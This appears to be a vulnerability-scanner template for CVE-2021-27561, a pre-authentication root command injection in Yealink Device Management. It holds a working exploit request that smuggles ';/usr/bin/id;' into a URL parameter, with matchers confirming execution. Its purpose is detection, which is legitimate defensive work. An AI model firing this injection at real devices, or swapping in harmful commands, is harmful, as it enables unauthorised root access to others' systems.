id: CVE-2021-27561 info: name: YeaLink DM 3.6.0.20 - Remote Command Injection author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. reference: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 - https://ssd-disclosure.com/?p=4688 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-77 tags: cve,cve2021,rce,yealink,mirai,kev requests: - method: GET path: - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" matchers-condition: and matchers: - type: word condition: and part: body words: - 'uid' - 'gid' - 'groups' - type: word part: header words: - 'application/json' - type: status status: - 200 extractors: - type: regex regex: - "(u|g)id=.*" # Enhanced by mp on 2022/05/17